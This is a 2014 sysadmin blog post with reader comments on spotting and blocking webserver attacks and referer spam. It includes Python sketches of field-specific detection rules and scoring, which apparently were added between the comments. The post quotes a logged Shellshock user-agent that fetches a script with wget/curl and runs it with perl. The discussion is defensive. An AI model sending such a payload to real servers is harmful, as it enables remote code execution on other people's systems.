Paying attention to webserver logs

Tuesday, 2 December 2014

If you run a webserver, chances are high that you'll get hit by random exploit attempts. Today one of my servers logged this, an obvious Shellshock exploit attempt:

- [02/Dec/2014:11:50:03 +0000] \
"GET /cgi-bin/dbs.cgi HTTP/1.1" 404 2325 \
 "-" "() { :;}; /bin/bash -c \"cd /var/tmp ; wget ; \
curl -O;perl pis;rm -rf pis\"; node-reverse-proxy.js"

Yesterday I got hit with thousands of these referer-spam attempts:

- - [02/Dec/2014:01:06:25 +0000] "GET / HTTP/1.1"  \
200 7425 "" \
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

When it comes to stopping dictionary attacks against SSH servers we have things like denyhosts and fail2ban (or even non-standard SSH ports).

For Apache/webserver exploits we have? mod_security?

I recently heard of apache-scalp which seems to be a project to analyse webserver logs to look for patterns indicative of attack-attempts.

Unfortunately the suggested ruleset comes from the PHP-IDS project and is horribly bad.

I wonder if there is any value in me trying to define rules to describe attacks. Either I do a good job and the rules are useful, or somebody else thinks the rules are bad - which is what I thought of the PHP-IDS set - I guess it's hard to know.

For the moment I look at the webserver logs every now and again and shake my head. Particularly bad remote IPs get firewalled and dropped, but beyond that I guess it is just background noise.




Comments On This Entry

[gravitar] gregoa

Submitted at 14:41:07 on 2 december 2014

I'm using fail2ban as well for webserver exploit attempts. Works quite fine for at least some typical patterns.

[author] Steve Kemp

Submitted at 14:44:06 on 2 december 2014

I've seen people use fail2ban against webserver logs before - but generally speaking they tend to have very loose rule definitions.

If I were to publish a list of patterns I'd be very specific about what they were compared to - for example "referer", "user-agent", "request", "method", etc.
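A minimal sketch of what field-specific patterns could look like, assuming the Apache "combined" log format. The field names, rule names, and patterns here are illustrative assumptions, not a published ruleset, and the IP in the usage note is a documentation placeholder.

```python
import re

# Assumes Apache's "combined" log format. The group names are this sketch's own.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<request>\S+) (?P<protocol>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"'
)

# Hypothetical rules: (name, field, pattern).
# Each pattern is only ever compared against the one field it names.
RULES = [
    ("shellshock-agent", "agent", re.compile(r"^\(\)\s*\{")),
    ("shellshock-referer", "referer", re.compile(r"^\(\)\s*\{")),
    ("cgi-probe", "request", re.compile(r"^/cgi-bin/")),
]


def parse(line):
    """Split one log line into named fields, or return None if it doesn't parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def matches(entry):
    """Return the names of all rules whose pattern matches its own field."""
    return [name for name, field, pat in RULES if pat.search(entry[field])]
```

Calling `matches(parse(line))` on a line such as `192.0.2.1 - - [02/Dec/2014:11:50:03 +0000] "GET /cgi-bin/dbs.cgi HTTP/1.1" 404 2325 "-" "() { :;}; /bin/bash -c \"id\""` reports the user-agent and request rules, while the same `() {` text appearing inside a URL path would not trigger the user-agent rule.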

[gravitar] Gunnar Wolf

Submitted at 14:56:14 on 2 december 2014

I use Suhosin on my (still-Squeeze) webserver, and it is one of the bits I miss nowadays, as it was removed from testing before Wheezy was released. It helps a lot in getting the information you mention.

Of course, I have had a long time to adopt it, and I have not done so. So... It's a package I find quite useful, but I know it causes more maintenance burden than I can handle.

[author] Steve Kemp

Submitted at 15:06:40 on 2 december 2014

I don't run PHP on my own personal hosts, but I do remember suhosin as being both useful and frustrating to configure.

I've seen people who are PHP-free use regular expressions such as "\.php" to block PHP-directed exploits - and that's exactly the kind of pattern that can cause problems if you use fail2ban, or similar, as it is grossly too-broad.
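To illustrate why a bare "\.php" is too broad, here is a small sketch comparing it with a narrower pattern that only matches when the path itself (before any query string) ends in ".php". The request paths are made up for the example, and even the narrower pattern remains a per-site decision.

```python
import re

# The loose pattern from the comment above: matches ".php" anywhere at all.
BROAD = re.compile(r"\.php")

# A narrower alternative (an assumption of this sketch): the path, before any
# query string, must end in ".php".
NARROW = re.compile(r"^[^?]*\.php(?:\?|$)")

# Made-up request paths for illustration.
REQUESTS = [
    "/wp-login.php",
    "/blog/2014/why-i-left.php-behind/",
    "/search?q=index.php",
    "/docs/php.html",
]


def flagged(pattern, paths):
    """Return the paths that the given pattern would flag."""
    return [p for p in paths if pattern.search(p)]
```

With these inputs `flagged(BROAD, REQUESTS)` also catches the blog permalink and the search query, which are legitimate requests on a PHP-free site, whereas `flagged(NARROW, REQUESTS)` only catches `/wp-login.php`.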

[author] Steve Kemp

Submitted at 15:40:46 on 2 december 2014

[gravitar] Diego Elio Pettenò

Submitted at 19:13:49 on 2 december 2014

I have built a ModSecurity-based ruleset for things like this; it can even be used independently if you don't like the OWASP ruleset by default.

I also have descriptions of the techniques I came up with in my blog, such as

[gravitar] me

Submitted at 21:08:33 on 2 december 2014

Is this really necessary? I mean, in particular the spam one. SSH blocking is risky enough as you might lock yourself out. But the risk of brute force password success is much more real than that of brute force shellshock success. And the spam is a nuisance, but not a threat to security, is it? Fail2ban etc. can reduce the risk of a naive user account being compromised because of a weak password. That is at least a real threat on multiuser networks, and the rate limiting does indeed reduce the risk by limiting the number of attempts. BTW, I have seen it show up in Google Analytics, too. It seems to be SEO spam.

[author] Steve Kemp

Submitted at 21:21:52 on 2 december 2014

Possibly not - the spam one in particular just annoyed me. Thousands of hits over a few days - that's just something we shouldn't be tolerating.

[gravitar] Steven C.

Submitted at 22:57:31 on 2 december 2014

Spam and aggressive crawls can take a substantial portion of your server's resources unless you're lucky enough to serve only static files.

I think it's worth deciding on a metric and a threshold at which point an IP, subnet, crawler or user agent, ISP, or whole country/region is best denied access or subject to other restrictions.

The cost/benefit of serving a particular visitor will depend on what you're hosting and who/where your customers are; it may vary for different websites or services on a server, or even for different sections/features of the websites (GET vs. POST requests?). It probably is worth putting some amount of time into studying this, if you could potentially reduce the load on your server[s] tenfold.
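One possible metric and threshold, as a rough sketch: count 4xx responses per IP and list the IPs that reach a limit. The choice of metric, the default threshold of 20, and the entry layout (dicts with "ip" and "status" keys) are all assumptions for illustration.

```python
from collections import Counter


def over_threshold(entries, threshold=20):
    """Return {ip: count} for IPs whose number of 4xx responses meets the threshold.

    `entries` is an iterable of dicts with at least "ip" and "status" keys,
    e.g. parsed access-log lines. The threshold value is arbitrary.
    """
    errors = Counter(
        e["ip"] for e in entries if 400 <= int(e["status"]) < 500
    )
    return {ip: n for ip, n in errors.items() if n >= threshold}
```

The same shape works for other metrics (bytes served, POST requests, hits per user agent) by changing what the counter is keyed on and what it counts.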

[gravitar] Daniel

Submitted at 07:31:21 on 3 december 2014

I used to use mod_rewrite to block referrer spam. The main reason then was to get a more accurate result of my weblog analyzer. Of course, the rules needed to be maintained manually and sites appear and disappear. So this is quite a lot of work (but I'm sure, you would have the same workload using fail2ban to block such referrer spam). I'm not doing this anymore (no weblog analyzers running :))

I also use fail2ban to block some attack attempts. I agree that there is no unique pattern, and every day there are some new ones. You would probably need some Spamhaus-like project to collect patterns and automatically distribute them to systems. Again, at the moment this is manual work AFAIK. However, maybe we can share the patterns we have discovered? Alioth?

[author] Steve Kemp

Submitted at 08:44:15 on 3 december 2014

This is why I suspect that rules are pretty personal - the rules which I'd block would include "Wordpress Login attempts", on the basis that I don't use wordpress.

But clearly a ruleset that defaulted to blocking wordpress wouldn't be useful to others, given how popular it is.

And that is exactly the reason why deciding on a threshold to block is going to be an administrator's decision. I suspect the best that can be done is to divide rules into "Always bad" and "You need to decide".

Always-bad rules would include the recent Drupal exploit, Shellshock, etc. Rules that require manual decisions would include PHP-things, Perl-things, and similar.
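The split into "Always bad" and "You need to decide" could be sketched roughly like this. The rule names and patterns are hypothetical examples, and the opt-in mechanism is just one way an administrator's decision might be recorded.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    field: str        # which log field the pattern is compared against
    pattern: str      # regular expression source
    always_bad: bool  # False means the administrator has to opt in


# Hypothetical rules for illustration only.
RULES = [
    Rule("shellshock", "agent", r"^\(\)\s*\{", always_bad=True),
    Rule("wordpress-login", "request", r"^/wp-login\.php(?:\?|$)", always_bad=False),
]


def active_rules(rules, opted_in=()):
    """Always-bad rules are always active; the rest only if explicitly opted in."""
    return [r for r in rules if r.always_bad or r.name in opted_in]
```

A site that runs no Wordpress would call `active_rules(RULES, opted_in={"wordpress-login"})`, while a Wordpress host would leave the default and only get the always-bad set.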

[gravitar] Jeremiah C. Foster

Submitted at 13:37:54 on 4 december 2014

I thought a SpamAssassin-like project might be useful: create a Bayesian filter for incoming requests? It would require a lot of work. :/

[gravitar] Steven C.

Submitted at 11:40:43 on 5 december 2014

SpamAssassin allows you to override scores for a rule, which would be useful here; so you could override the score of WORDPRESS_LOGIN_ATTEMPT from 0.1 (slightly spammy) to 100.0 (definitely block).

I think it'd be more useful to group sets of rules into categories or parent classes, to more easily adjust scores up/down for all Wordpress things at once, or even all PHP things if you don't use it.
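A rough sketch of per-rule and per-category score overrides in that spirit. Only WORDPRESS_LOGIN_ATTEMPT and its 0.1 and 100.0 scores come from the comment above; the other rule names, the category mapping, and the blocking threshold are assumptions made up for the example, and none of this is SpamAssassin's own configuration syntax.

```python
# Default scores; everything except WORDPRESS_LOGIN_ATTEMPT is hypothetical.
DEFAULT_SCORES = {
    "WORDPRESS_LOGIN_ATTEMPT": 0.1,
    "WORDPRESS_XMLRPC": 0.1,
    "SHELLSHOCK": 100.0,
}

# Hypothetical grouping of rules into categories.
CATEGORY = {
    "WORDPRESS_LOGIN_ATTEMPT": "wordpress",
    "WORDPRESS_XMLRPC": "wordpress",
}


def effective_score(rule, rule_overrides=None, category_overrides=None):
    """Per-rule override wins, then per-category override, then the default."""
    rule_overrides = rule_overrides or {}
    category_overrides = category_overrides or {}
    if rule in rule_overrides:
        return rule_overrides[rule]
    category = CATEGORY.get(rule)
    if category in category_overrides:
        return category_overrides[category]
    return DEFAULT_SCORES[rule]


def should_block(hits, threshold=5.0, **overrides):
    """Sum the scores of all rules a request hit; the threshold is arbitrary."""
    total = sum(effective_score(h, **overrides) for h in hits)
    return total >= threshold
```

A Wordpress-free site could pass `category_overrides={"wordpress": 50.0}` to raise every Wordpress rule at once, instead of overriding each rule by name.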

Except - it doesn't sound very practical to accumulate scores across multiple requests from an IP. If your website is popular, there'd be so many IPs (and perhaps many IPv6 prefixes too).

If you could somehow do this, it'd be nice to share that reputation data between many servers at a site, or with the community.

Another problem is that in the past year we saw a botnet of over 30,000 IPs being used to bruteforce Wordpress; filtering that many IPs in Linux seems to be non-trivial (I think ipt_recent was the best option).

Oh by the way, Nginx naxsi module already does heuristic filtering, essentially blocking requests if they contained many odd symbols in the request or headers; which the exploits for Shellshock, Drupageddon etc. all do.
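The "many odd symbols" idea can be sketched in a few lines. This is only an illustration of the heuristic as described in the comment, not naxsi's actual rules or scoring; the symbol set and the limit are assumptions, chosen so that parentheses and semicolons (which appear in ordinary browser user agents) are not counted.

```python
# Characters treated as "odd" in this sketch. Parentheses and semicolons are
# deliberately left out because normal User-Agent strings contain them.
ODD_SYMBOLS = set("{}<>|`$\\'\"")


def odd_symbol_count(*values):
    """Count odd symbols across the given request fields."""
    return sum(1 for value in values for ch in value if ch in ODD_SYMBOLS)


def looks_suspicious(request, referer, agent, limit=3):
    """Flag a request whose fields contain at least `limit` odd symbols."""
    return odd_symbol_count(request, referer, agent) >= limit
```

A Shellshock-style user agent such as `() { :;}; /bin/bash -c "id"` trips the limit through its braces and quotes, while the Chrome user agent from the referer-spam log line contains none of the counted symbols.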

[gravitar] Amos

Submitted at 01:37:18 on 9 december 2014

Re: Steven C.'s comment about filtering massive numbers of addresses - ipset might help here, e.g.

